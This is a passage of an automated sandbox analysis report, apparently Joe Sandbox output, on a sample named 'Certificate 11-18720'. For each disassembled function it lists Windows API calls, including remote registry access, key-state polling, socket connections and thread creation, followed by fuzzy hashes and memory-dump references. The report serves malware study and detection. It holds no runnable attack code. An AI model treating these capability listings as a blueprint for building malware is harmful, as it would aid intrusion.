                                                                                    • Opcode Fuzzy Hash: 044ae81484e06f213167f7f26a47d0c4fa6520447f31d0e9b525c3171f274f7e
                                                                                    • Instruction Fuzzy Hash: 09517E75A00616DFDB00EFA8D485EEDBBB6BF49310B048059E915AB352DB30ED42CF50
                                                                                    Function 00622E29 Relevance: 7.6, APIs: 5, Instructions: 144registryCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                      • Part of subcall function 00623C06: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00622BB5,?,?), ref: 00623C1D
                                                                                    • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00622EEF
                                                                                    • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00622F2E
                                                                                    • RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 00622F75
                                                                                    • RegCloseKey.ADVAPI32(?,?), ref: 00622FA1
                                                                                    • RegCloseKey.ADVAPI32(00000000), ref: 00622FAE
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1703473779.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1703456521.00000000005C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000064D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000066E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703589433.000000000067A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703619244.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_5c0000_Certificate 11-18720.jbxd
                                                                                    Similarity
                                                                                    • API ID: Close$BuffCharConnectEnumOpenRegistryUpper
                                                                                    • String ID:
                                                                                    • API String ID: 3740051246-0
                                                                                    • Opcode ID: 68c6fe28e6182e180fa0b42f9c4054bf11060116568978fa0723d0d5e8583b35
                                                                                    • Instruction ID: e87c1ca201209ded0316c6caa7d37265f28e9b3e0ab92afb698e112ae09328d8
                                                                                    • Opcode Fuzzy Hash: 68c6fe28e6182e180fa0b42f9c4054bf11060116568978fa0723d0d5e8583b35
                                                                                    • Instruction Fuzzy Hash: 99515971208206AFC704EF94D995FAABBFAFF88714F04892DF59587291DB30E905CB52
                                                                                    Function 0062CCF7 Relevance: 7.6, APIs: 5, Instructions: 129COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1703473779.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1703456521.00000000005C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000064D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000066E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703589433.000000000067A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703619244.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_5c0000_Certificate 11-18720.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 2162e89e6a4acf91fbaf24880c37689789d9ed30a9b7479e8e508b62e50a63ee
                                                                                    • Instruction ID: 61cd483d0ff83351b2688d9ce80f7343a01d4627b29cea5ceaee473bb5397400
                                                                                    • Opcode Fuzzy Hash: 2162e89e6a4acf91fbaf24880c37689789d9ed30a9b7479e8e508b62e50a63ee
                                                                                    • Instruction Fuzzy Hash: 7D41C339900924AFC720DB68DC44FEDBB6AEF0A360F150665E959A72E1C670AD42DE50
                                                                                    Function 00611206 Relevance: 7.6, APIs: 5, Instructions: 127COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • GetPrivateProfileSectionW.KERNEL32(00000003,?,00007FFF,?), ref: 006112B4
                                                                                    • GetPrivateProfileSectionW.KERNEL32(?,00000001,00000003,?), ref: 006112DD
                                                                                    • WritePrivateProfileSectionW.KERNEL32(?,?,?), ref: 0061131C
                                                                                      • Part of subcall function 005C936C: __swprintf.LIBCMT ref: 005C93AB
                                                                                      • Part of subcall function 005C936C: __itow.LIBCMT ref: 005C93DF
                                                                                    • WritePrivateProfileStringW.KERNEL32(00000003,00000000,00000000,?), ref: 00611341
                                                                                    • WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 00611349
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1703473779.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1703456521.00000000005C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000064D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000066E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703589433.000000000067A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703619244.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_5c0000_Certificate 11-18720.jbxd
                                                                                    Similarity
                                                                                    • API ID: PrivateProfile$SectionWrite$String$__itow__swprintf
                                                                                    • String ID:
                                                                                    • API String ID: 1389676194-0
                                                                                    • Opcode ID: 92a18291b7498ac0fa73727b2ea6f51ea44426e0dd2dc1301d84179401d6c074
                                                                                    • Instruction ID: e11df4d31647e55f02a7960f87721d963a2571f5876154fa3d1325edd7f46be4
                                                                                    • Opcode Fuzzy Hash: 92a18291b7498ac0fa73727b2ea6f51ea44426e0dd2dc1301d84179401d6c074
                                                                                    • Instruction Fuzzy Hash: 40410935A00145DFCB01EFA4C985EAEBBF5FF49710B148099E90AAB362CB31EE41DB50
                                                                                    Function 005DB63C Relevance: 7.6, APIs: 5, Instructions: 110keyboardCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • GetCursorPos.USER32(000000FF), ref: 005DB64F
                                                                                    • ScreenToClient.USER32(00000000,000000FF), ref: 005DB66C
                                                                                    • GetAsyncKeyState.USER32(00000001), ref: 005DB691
                                                                                    • GetAsyncKeyState.USER32(00000002), ref: 005DB69F
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1703473779.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1703456521.00000000005C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000064D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000066E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703589433.000000000067A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703619244.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_5c0000_Certificate 11-18720.jbxd
                                                                                    Similarity
                                                                                    • API ID: AsyncState$ClientCursorScreen
                                                                                    • String ID:
                                                                                    • API String ID: 4210589936-0
                                                                                    • Opcode ID: b744c2ab7ccd5d215135ee5827a2217baf1d54841463109573a1e4ce56d93363
                                                                                    • Instruction ID: 3aa8532a3ca59d7d71a89a95b99a86caffcbc6e878a8c4122ac43235e6fc99bb
                                                                                    • Opcode Fuzzy Hash: b744c2ab7ccd5d215135ee5827a2217baf1d54841463109573a1e4ce56d93363
                                                                                    • Instruction Fuzzy Hash: 02416035904115FFDF259F68C884AE9BB76FB05324F11431AF86996290CB30A994DFA1
                                                                                    Function 005FB358 Relevance: 7.6, APIs: 5, Instructions: 88sleepwindowCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • GetWindowRect.USER32(?,?), ref: 005FB369
                                                                                    • PostMessageW.USER32(?,00000201,00000001), ref: 005FB413
                                                                                    • Sleep.KERNEL32(00000000,?,00000201,00000001,?,?,?), ref: 005FB41B
                                                                                    • PostMessageW.USER32(?,00000202,00000000), ref: 005FB429
                                                                                    • Sleep.KERNEL32(00000000,?,00000202,00000000,?,?,00000201,00000001,?,?,?), ref: 005FB431
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1703473779.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1703456521.00000000005C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000064D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000066E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703589433.000000000067A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703619244.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_5c0000_Certificate 11-18720.jbxd
                                                                                    Similarity
                                                                                    • API ID: MessagePostSleep$RectWindow
                                                                                    • String ID:
                                                                                    • API String ID: 3382505437-0
                                                                                    • Opcode ID: 96b3cc8b1b9c8ca797b00328c767c52147bfab1a542ca8c6a50bd69e7e470e4a
                                                                                    • Instruction ID: 9d7bbfbce7320fcddd1af1254d560852ebc79cc54f8e17b3a2705cac35a004d7
                                                                                    • Opcode Fuzzy Hash: 96b3cc8b1b9c8ca797b00328c767c52147bfab1a542ca8c6a50bd69e7e470e4a
                                                                                    • Instruction Fuzzy Hash: CC31CC7190021DEBEF04DFA8D94DAAE3FB6FB05319F104629FA25AB1D1C3B49914CB91
                                                                                    Function 005FDBBF Relevance: 7.6, APIs: 5, Instructions: 87windowCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • IsWindowVisible.USER32(?), ref: 005FDBD7
                                                                                    • SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 005FDBF4
                                                                                    • SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 005FDC2C
                                                                                    • CharUpperBuffW.USER32(00000000,00000000,?,?,?,?), ref: 005FDC52
                                                                                    • _wcsstr.LIBCMT ref: 005FDC5C
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1703473779.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1703456521.00000000005C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000064D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000066E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703589433.000000000067A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703619244.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_5c0000_Certificate 11-18720.jbxd
                                                                                    Similarity
                                                                                    • API ID: MessageSend$BuffCharUpperVisibleWindow_wcsstr
                                                                                    • String ID:
                                                                                    • API String ID: 3902887630-0
                                                                                    • Opcode ID: a026c31628c35d9773a093574182071537bf2b944a0fbca1227ce54e0581ab13
                                                                                    • Instruction ID: 0067ff51961ded39d249870de73548bdb17e81241e30941cc489368c5ee1718e
                                                                                    • Opcode Fuzzy Hash: a026c31628c35d9773a093574182071537bf2b944a0fbca1227ce54e0581ab13
                                                                                    • Instruction Fuzzy Hash: B721F571604148BBEB259F399C49E7B7FAAFF85750F10402AF90ACA191EAA5CC4196A0
                                                                                    Function 005FBC77 Relevance: 7.6, APIs: 5, Instructions: 82windowCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 005FBC90
                                                                                    • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 005FBCC2
                                                                                    • __itow.LIBCMT ref: 005FBCDA
                                                                                    • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 005FBD00
                                                                                    • __itow.LIBCMT ref: 005FBD11
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1703473779.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1703456521.00000000005C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000064D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000066E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703589433.000000000067A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703619244.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_5c0000_Certificate 11-18720.jbxd
                                                                                    Similarity
                                                                                    • API ID: MessageSend$__itow
                                                                                    • String ID:
                                                                                    • API String ID: 3379773720-0
                                                                                    • Opcode ID: 3172b5ec9b98d0f0bf4c2fca7b7cc3bd39b89c098e4a35bf601803bc9c07cf81
                                                                                    • Instruction ID: d8e6a4b3db5bb4fea1dccd78ecce4d6c26db5bbca29b654c3649a7ee6cf8f1a6
                                                                                    • Opcode Fuzzy Hash: 3172b5ec9b98d0f0bf4c2fca7b7cc3bd39b89c098e4a35bf601803bc9c07cf81
                                                                                    • Instruction Fuzzy Hash: 9D21C97570020DFAEB10AAA5CC4AFEF7E69BF99710F011025FB45EB181EB748D4587A2
                                                                                    Function 00606318 Relevance: 7.6, APIs: 5, Instructions: 80COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                      • Part of subcall function 005C50E6: _wcsncpy.LIBCMT ref: 005C50FA
                                                                                    • GetFileAttributesW.KERNEL32(?,?,?,?,006060C3), ref: 00606369
                                                                                    • GetLastError.KERNEL32(?,?,?,006060C3), ref: 00606374
                                                                                    • CreateDirectoryW.KERNEL32(?,00000000,?,?,?,006060C3), ref: 00606388
                                                                                    • _wcsrchr.LIBCMT ref: 006063AA
                                                                                      • Part of subcall function 00606318: CreateDirectoryW.KERNEL32(?,00000000,?,?,?,006060C3), ref: 006063E0
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1703473779.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1703456521.00000000005C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000064D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000066E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703589433.000000000067A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703619244.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_5c0000_Certificate 11-18720.jbxd
                                                                                    Similarity
                                                                                    • API ID: CreateDirectory$AttributesErrorFileLast_wcsncpy_wcsrchr
                                                                                    • String ID:
                                                                                    • API String ID: 3633006590-0
                                                                                    • Opcode ID: cb73b8f1f7a2487cad6b5f66be51f311cae01490ad34020d76ce3c8acd7917c8
                                                                                    • Instruction ID: ae9c32f662a8add5f36ae9e44041d2275b62ff5922e5f603cf86a50d8dc47dbc
                                                                                    • Opcode Fuzzy Hash: cb73b8f1f7a2487cad6b5f66be51f311cae01490ad34020d76ce3c8acd7917c8
                                                                                    • Instruction Fuzzy Hash: E721DB319842155ADB2DAB78EC56FEB235EFF06390F102466F145D72C0EFA0D99186A4
                                                                                    Function 00618B95 Relevance: 7.6, APIs: 5, Instructions: 71networkCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                      • Part of subcall function 0061A82C: inet_addr.WSOCK32(00000000,00000000,?,?,?,00000000), ref: 0061A84E
                                                                                    • socket.WSOCK32(00000002,00000001,00000006,?,?,00000000), ref: 00618BD3
                                                                                    • WSAGetLastError.WSOCK32(00000000), ref: 00618BE2
                                                                                    • connect.WSOCK32(00000000,?,00000010), ref: 00618BFE
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1703473779.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1703456521.00000000005C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000064D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000066E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703589433.000000000067A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703619244.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_5c0000_Certificate 11-18720.jbxd
                                                                                    Similarity
                                                                                    • API ID: ErrorLastconnectinet_addrsocket
                                                                                    • String ID:
                                                                                    • API String ID: 3701255441-0
                                                                                    • Opcode ID: 60fec44186c6afec39731dc012939d872bf141c78214beb6d1fc5b441138f9be
                                                                                    • Instruction ID: abea57fdaf8a32b84b6dbe44dd52bea874d447787570e0dae615121271404149
                                                                                    • Opcode Fuzzy Hash: 60fec44186c6afec39731dc012939d872bf141c78214beb6d1fc5b441138f9be
                                                                                    • Instruction Fuzzy Hash: DB21C3356001159FCB10EF68CD49FBE77AAAF45720F04445DF906973D2CB70AC418B51
                                                                                    Function 00618420 Relevance: 7.6, APIs: 5, Instructions: 69COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • IsWindow.USER32(00000000), ref: 00618441
                                                                                    • GetForegroundWindow.USER32 ref: 00618458
                                                                                    • GetDC.USER32(00000000), ref: 00618494
                                                                                    • GetPixel.GDI32(00000000,?,00000003), ref: 006184A0
                                                                                    • ReleaseDC.USER32(00000000,00000003), ref: 006184DB
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1703473779.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1703456521.00000000005C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000064D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000066E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703589433.000000000067A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703619244.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_5c0000_Certificate 11-18720.jbxd
                                                                                    Similarity
                                                                                    • API ID: Window$ForegroundPixelRelease
                                                                                    • String ID:
                                                                                    • API String ID: 4156661090-0
                                                                                    • Opcode ID: 9edf044c2fa4dd0db3f635b169e7444698da41d359db4adaef137e83648dffaa
                                                                                    • Instruction ID: dee34340f7582e65edc22c93ece9858b109bc4660ceb12ca60bc17e8d653869d
                                                                                    • Opcode Fuzzy Hash: 9edf044c2fa4dd0db3f635b169e7444698da41d359db4adaef137e83648dffaa
                                                                                    • Instruction Fuzzy Hash: AB216F7AA00205AFD714DFA4DC89AAEBBF6EF49301F04C479E85997351DA70AC40CB60
                                                                                    Function 005DAF83 Relevance: 7.6, APIs: 5, Instructions: 67COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,?,00000000), ref: 005DAFE3
                                                                                    • SelectObject.GDI32(?,00000000), ref: 005DAFF2
                                                                                    • BeginPath.GDI32(?), ref: 005DB009
                                                                                    • SelectObject.GDI32(?,00000000), ref: 005DB033
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1703473779.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1703456521.00000000005C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000064D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000066E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703589433.000000000067A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703619244.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_5c0000_Certificate 11-18720.jbxd
                                                                                    Similarity
                                                                                    • API ID: ObjectSelect$BeginCreatePath
                                                                                    • String ID:
                                                                                    • API String ID: 3225163088-0
                                                                                    • Opcode ID: b925320e032026988248f6125be59fc2581c4b0d879e67cf8266c404f62ee02e
                                                                                    • Instruction ID: 14d463e3b89e7f61fc6c929d1aa3b9c4b4589528cf72f5fa012517132afb3053
                                                                                    • Opcode Fuzzy Hash: b925320e032026988248f6125be59fc2581c4b0d879e67cf8266c404f62ee02e
                                                                                    • Instruction Fuzzy Hash: 2521A174800205FFEB21DF59EC4879A7B6FBB12395F24531BE4609A2A0E3714992CB90
                                                                                    Function 005E217F Relevance: 7.6, APIs: 5, Instructions: 61threadCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • __calloc_crt.LIBCMT ref: 005E21A9
                                                                                    • CreateThread.KERNEL32(?,?,005E22DF,00000000,?,?), ref: 005E21ED
                                                                                    • GetLastError.KERNEL32 ref: 005E21F7
                                                                                    • _free.LIBCMT ref: 005E2200
                                                                                    • __dosmaperr.LIBCMT ref: 005E220B
                                                                                      • Part of subcall function 005E7C0E: __getptd_noexit.LIBCMT ref: 005E7C0E
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1703473779.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1703456521.00000000005C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000064D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000066E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703589433.000000000067A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703619244.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_5c0000_Certificate 11-18720.jbxd
                                                                                    Similarity
                                                                                    • API ID: CreateErrorLastThread__calloc_crt__dosmaperr__getptd_noexit_free
                                                                                    • String ID:
                                                                                    • API String ID: 2664167353-0
                                                                                    • Opcode ID: 90b49e3a95e3c5c905b40fbc9926d4ab7990f3a40c082b986fe965c7e2e655ce
                                                                                    • Instruction ID: f2d8c3813465ebbeaca6d853979a6f67fe953224a9ecb4f0cff36937a7858778
                                                                                    • Opcode Fuzzy Hash: 90b49e3a95e3c5c905b40fbc9926d4ab7990f3a40c082b986fe965c7e2e655ce
                                                                                    • Instruction Fuzzy Hash: D711E5361047CB6FDB19AF679C45D6F3F9DFF45760B100429FA9486185EB31880186A0
                                                                                    Function 005FABBB Relevance: 7.5, APIs: 5, Instructions: 48memoryCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • GetUserObjectSecurity.USER32(?,?,?,00000000,?), ref: 005FABD7
                                                                                    • GetLastError.KERNEL32(?,005FA69F,?,?,?), ref: 005FABE1
                                                                                    • GetProcessHeap.KERNEL32(00000008,?,?,005FA69F,?,?,?), ref: 005FABF0
                                                                                    • HeapAlloc.KERNEL32(00000000,?,005FA69F,?,?,?), ref: 005FABF7
                                                                                    • GetUserObjectSecurity.USER32(?,?,00000000,?,?), ref: 005FAC0E
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1703473779.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1703456521.00000000005C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000064D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000066E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703589433.000000000067A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703619244.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_5c0000_Certificate 11-18720.jbxd
                                                                                    Similarity
                                                                                    • API ID: HeapObjectSecurityUser$AllocErrorLastProcess
                                                                                    • String ID:
                                                                                    • API String ID: 842720411-0
                                                                                    • Opcode ID: 773426db96c338dbd358d3491c68b88d7cd45b605eaea4238bf44ee04fc23483
                                                                                    • Instruction ID: 3cb492a8196ee24d86942d0dfce55c8825c484d00087e0fe42eb4fc97dfbee40
                                                                                    • Opcode Fuzzy Hash: 773426db96c338dbd358d3491c68b88d7cd45b605eaea4238bf44ee04fc23483
                                                                                    • Instruction Fuzzy Hash: 46013CB5600208BFDB114FA9DC48DAB3FAEFF8A755B101469F949C3260DA71DC40CB61
                                                                                    Function 00607A58 Relevance: 7.5, APIs: 5, Instructions: 47sleepCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • QueryPerformanceCounter.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 00607A74
                                                                                    • QueryPerformanceFrequency.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 00607A82
                                                                                    • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 00607A8A
                                                                                    • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 00607A94
                                                                                    • Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 00607AD0
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1703473779.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1703456521.00000000005C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000064D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000066E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703589433.000000000067A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703619244.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_5c0000_Certificate 11-18720.jbxd
                                                                                    Similarity
                                                                                    • API ID: PerformanceQuery$CounterSleep$Frequency
                                                                                    • String ID:
                                                                                    • API String ID: 2833360925-0
                                                                                    • Opcode ID: 5706a01a5970a471278fbd79474d42ee26faa17fb3482f695a00dab7e78a389f
                                                                                    • Instruction ID: 0cd6f471e2ee2f3248ff61a1374ee65c53a0f28e76824c52e0a31a2258b430de
                                                                                    • Opcode Fuzzy Hash: 5706a01a5970a471278fbd79474d42ee26faa17fb3482f695a00dab7e78a389f
                                                                                    • Instruction Fuzzy Hash: B2014C75E44619EBCF08EFE4DC48ADEBB7AFF09711F000495E902B2290DB30AA5487A5
                                                                                    Function 005F9ABF Relevance: 7.5, APIs: 5, Instructions: 47stringCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • CLSIDFromProgID.OLE32 ref: 005F9ADC
                                                                                    • ProgIDFromCLSID.OLE32(?,00000000), ref: 005F9AF7
                                                                                    • lstrcmpiW.KERNEL32(?,00000000), ref: 005F9B05
                                                                                    • CoTaskMemFree.OLE32(00000000,?,00000000), ref: 005F9B15
                                                                                    • CLSIDFromString.OLE32(?,?), ref: 005F9B21
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1703473779.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1703456521.00000000005C0000.00000002.00000001.01000000.00000003.sdmpDownload File
